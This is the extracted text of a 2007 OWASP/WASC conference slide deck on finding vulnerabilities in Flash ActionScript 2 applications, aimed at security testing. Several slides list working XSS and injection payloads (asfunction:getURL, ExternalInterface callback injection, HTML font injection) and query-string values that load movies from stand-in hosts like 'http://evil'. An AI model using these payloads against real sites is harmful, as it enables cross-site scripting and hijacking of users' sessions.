Finding Vulnerabilities in Flash Applications OWASP & WASC

Finding Vulnerabilities in Flash
Applications
Stefano Di Paola
CTO MindedSecurity
[email protected]
+393209495590
OWASP &
WASC
AppSec 2007
Conference
San Jose – Nov 2007
http://www.webappsec.org/
Copyright © 2007 - The OWASP Foundation
Permission is granted to copy, distribute and/or modify this document under the
terms of the Creative Commons Attribution-ShareAlike 2.5 License. To view this
license, visit http://creativecommons.org/licenses/by-sa/2.5/
The OWASP Foundation
http://www.owasp.org/
$ Whoami^J
Stefano Di Paola:
 CTO & Co-Founder Minded Security
 Security Engineer & Researcher
 Web App Pen Tester
 Code Review and Forensic
 Vulnerabilities (PDF UXSS & Others)
 OWASP Italy R&D Director
OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007
2
Agenda





Introduction
SWF Client Side Attacks
Finding Injection Entry Points
Potentially Dangerous Native Functions and Objects
Runtime Analysis
OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007
3
Agenda





Introduction
SWF Client Side Attacks
Finding Injection Entry Points
Potentially Dangerous Native Functions and Objects
Runtime Analysis
OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007
4
Objectives




Focus on Flash ActionScript 2 Applications Security
Understand the attack flow
Dead Code Analysis Methodology
Runtime Analysis Methodology
OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007
5
Flash Apps - Security Concerns
Can execute JavaScript when embedded in a HTML
page and viewed from inside a Browser.
Can forge binary requests and HTTP Requests.
Can execute external Flash Movies.
Can play Audio/Video files natively.
Can display minimal HTML code inside a TextField.
OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007
Agenda





Introduction
SWF Client Side Attacks
Finding Injection Entry Points
Potentially Dangerous Native Functions and Objects
Runtime Analysis
OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007
7
SWF Client Side Attacks
This new attack vector was presented @ OWASP
2007 Appsec Conference in Milan, Italy
Relies on flawed SWF files and not on SWF parser
A flawed SWF is a SWF which could allow
classical XSS
Cross Site Flashing (the dark side of cross movie scripting)
OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007
8
Cross Site Flashing (XSF)
XSF occurs when from different domains:
One Movie loads another Movie with loadMovie*
functions or other hacks and has access to the same
sandbox or part of it
XSF could also occurs when an HTML page uses
*Script to script a Macromedia Flash movie, for
example, by calling:
 GetVariable: access to flash public and static object from
javascript as a string.
 SetVariable: set a static or public flash object to a new string
value from javascript.
Unexpected Browser to SWF communication could
result in stealing data from SWF application
OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007
9
Accomplishing an Attack using flawed SWF
 When a link to a flawed SWF is directly pasted to the
location bar every browser automatically generates
some HTML with Object and/or Embed tags:
<html>
<body marginwidth="0" marginheight="0">
<embed width="100%" height="100%" name="plugin" src="http://Url/To/Swf"
type="application/x-shockwave-flash"/>
</body>
</html>
OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007
10
Attack Example to a Flawed SWF
 A flawed SWF was uploaded to vi.ct.im Host.
 Contains the following code
v1.loadv = function () {
this.varTarget = new
MovieClip();
_root.createEmptyMovieClip('varTarge
t', 10);
var v2 = new XML();
v2.load(_root.test);
};
 Let's see what an attacker could do with a browser
(Video)
OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007
11
Accomplish an attack
So clicking and redirecting to a SWF will let
the browser execute it on the main window.
Works with every browser.
IE7 needs:
try{code}catch(e){location.re
load()}
Iframe 'src' could be used too.
Tested on Firefox
SWF/Browser interaction doesn't work in IE7
using javascript:.
We'll see when it works even with IE7
OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007
The Attack Flow
We will see the dangerous mechanisms
that could lead to Client Side Attacks
URL QueryString
Global Uninitialized Variables
flashVars
External Movies
Remote XML files
MP3 and Flv Movies
Embedded HTML
OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007
Agenda





Introduction
SWF Client Side Attacks
Finding Injection Entry Points
Potentially Dangerous Native Functions and Objects
Runtime Analysis
OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007
Register Globals in ActionScript
Similar to PHP Register Globals
 Every uninitialized variable with
global scope is a potential threat:





_root.*
_global.*
_level0.*
.*
if (_root.language != undefined) {
Locale.DEFAULT_LANG = _root.language;
}
v5.load(Locale.DEFAULT_LANG + '/player_' +
Locale.DEFAULT_LANG + '.xml');
It is easy to add it as a
parameter in the query string:

http://URL?language=http://evil
OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007
15
Register Globals in Included Files 1/2


Assumptions made for _leveln movies are wrong when a movie
supposed to be at level1 is loaded as _level0
_level(n-1).*
/* Level0 Movie */
_level0.DEMO_PATH = getHost(this._url);
loadMovieNum(_level0.DEMO_PATH + _level0.PATH_DELIMITER + 'upperlev.swf',
(_level0.demo_level + 1));
....
/* Level1 Movie 'upperlev.swf' */
....
loadMovieNum(_level0.DEMO_PATH + _level0.PATH_DELIMITER + 'debugger.swf',
(_level0.control_level + 1));
......
OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007
16
Register Globals in Included Files 2/2

Then let's load upperlev.swf and then use query
string to initialize DEMO_PATH:
http://host/upperlev.swf?DEMO_PATH=http://evil
/* Level1 Movie 'upperlev.swf' */
....
loadMovieNum(_level0.DEMO_PATH + _level0.PATH_DELIMITER + 'debugger.swf',
(_level0.control_level + 1));
......
OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007
17
Agenda






Introduction
SWF Client Side Attacks
Finding Injection Entry Points
Potentially Dangerous Native Functions and Objects
Runtime Analysis
Static Analysis
OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007
Attack Patterns – Quick Reference
 Some Attack patterns were already described in:
Testing Flash Applications
 http://www.wisec.it/docs.php?id=5
 A quick reference of attack patterns which trigger
XSS in SWF:
asfunction:getURL,javascript:alert('XSS')
javascript:alert('XSS')
<img src='javascript:alert(“XSS”)//.jpg'>
http://evil.ltd/evilversion7.swf
OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007
19
Attack Patterns – Quick Reference
 A quick reference of PDNF and Objects where attack
pattern could be injected:
getURL
load*(URL,..) Functions







loadVariables(url, level )
LoadMovie ( url, target )
LoadMovieNum( url, level )
XML.load ( url )
LoadVars.load ( url )
Sound.loadSound( url , isStreaming );
NetStream.play( url );
TextField.htmlText
OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007
20
Attack Patterns – GetURL New Issue
The GET issue^N^N^N^N^Nfeature:
getURL('javascript:SomeFunc(“someValue”)','','GET')
From Adobe:
“..The GET method appends the variables to the end of the URL, and is used for
small numbers of variables..”
if a SWF contains the above, a request like
http://victim/noundef.swf?a=0:0;alert('
XSS')
becomes:
javascript:SomeFunc(“someValue”)?a=0:0;alert(123)
Credits go to SirDarckCat and Kuza55 who found it
OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007
21
Attack Patterns – ExternalInterface New Issue
 flash.external.ExternalInterface.call syntax
public static call(methodName:String,
[parameter1:Object])
Actually, methodName could be any Javascript code. In
fact, when call('method123') is executed, a javascript
function is called (www.develotec.com/flash8api.txt):
try { __flash__toXML(method123()) ; } catch (e) {
"<undefined/>"; }
OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007
22
External Interface Attack
 What happens if a SWF contains:
flash.external.ExternalInterface.call(_
root.callback)
http://host/swf?callback=(new Function(“alert(‘Xss’)”))
__flash__toXML((new Function(“alert(‘Xss’)”))())
 Works with Iframe and IE7 too
OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007
Attack Patterns – Font New Issue
 Some code like
createTextField("txt", 999, 10, 10, 320, 240);
txt.html=true;
var _tf:TextFormat = new TextFormat();
_tf.font = _root.fontFamily;
txt.setTextFormat( _tf );
txt.htmlText='something';
 Rewrites ‘something’ to
<p font=“TIMES”>something</p>
 That could be exploited by injecting:
 fontFamily = '”><img src=”http://evil/evil.swf”><”'
OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007
24
Modify the Data Flow 1/4
Multiple classes and packages are often used to
separate functionality.
In Flash, every class/package like
class simpleClass{}
is compiled in the following way:
push 'simpleClass'
getVariable
not
not
branchIfTrue label1
...
label1
end
OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007
25
Modify the Data Flow 2/4
Decompiled by flare, results in:
if (!simpleClass) {
_global.simpleClass = function () {};
...
}
So simpleClass is a _global attribute.
This means that it's initially undefined.
So it can be instantiated with a string value from the
query string
OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007
26
Modify the Data Flow 3/4
 Suppose there is a class like:
class simpleUtils {
static public function testForSomething(){
if(ok) return true;
else return false;
} ...
class simpleClass {
static function main(){
if(!simpleUtils.testForSomething())
getURL('javascript:alert("Sorry!")');
else
getURL('javascript:alert("ok!")');
} ...
OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007
27
Modify the Data Flow 4/4
Sending the request:
http://host/swf.swf?simpleUtils=blah
sets the object simpleUtils to an instantiated string,
so:
simpleUtils.testForSomething()
becomes undefined and the flow is modified.
if(!simpleUtils.testForSomething())
getURL('javascript:alert("Sorry!")');
else
getURL('javascript:alert("ok!")');
OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007
28
Agenda





Introduction
SWF Client Side Attacks
Finding Injection Entry Points
Potentially Dangerous Native Functions and Objects
Runtime Analysis
OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007
29
Recipe for Runtime Analysis
 A method to find uninitialized variables
 A SWF Container which loads the external one
 One array of attack patterns
 A framework to mix our ingredients
OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007
30
Find Undefined Vars @ Runtime
 Definition of __resolve:
from Adobe:
“a reference to a user-defined function that is invoked if ActionScript code
refers to an undefined property or method. If ActionScript code refers to an
undefined property or method of an object, Flash Player determines whether
the object's __resolve property is defined.”
As we need to find _root.* or _global.* undefined
variables:
_root.__resolve = function
(name){
// name is undefined
}
OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007
31
Attack Patterns Array
 From our knowledge base, an attack Array will contain
the following elements:
Direct load asfunction:
 getURL,javascript:gotRoot("")///d.jpg
Controlled Evil Page/Host:
 http://at.tack.er/evil.swf
Flash Html Injection:
 “'><img src='asfunction:getURL,javascript:gotRoot(“”)//.jpg' >
Dom Injection:
 (gotRoot(''))
Js/Flash Error:
 “'|!$%&/)=
OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007
32
A SWF Container
 The SWF to be analyzed is closed, so we need a wrapper
which shares _root and _global variables
 The wrapper will contain __resolve methods for _root and
_globals.
var image_mcl = new MovieClipLoader();
image_mcl.addListener(mclListener);
_root._lockroot=true
image_mcl.loadClip( _root.swfurl+"?"+ _root.varToSend, _root.varTarget);
OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007
33
A framework: SWFRTAnalyzer
OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007
34
Conclusions
 A free version of the SWF Runtime Analyser will be
released by Minded Security.
 Awareness about ActionScript security is growing but
is still a drop in the ocean.
 There is still a lot of research to do about Actionscript
security.
OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007
35
Thank you :) Questions?
Web: http://www.mindedsecurity.com
Weblog: http://www.wisec.it
Email: stefano.dipaola_at_mindedsecurity.com
OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007
36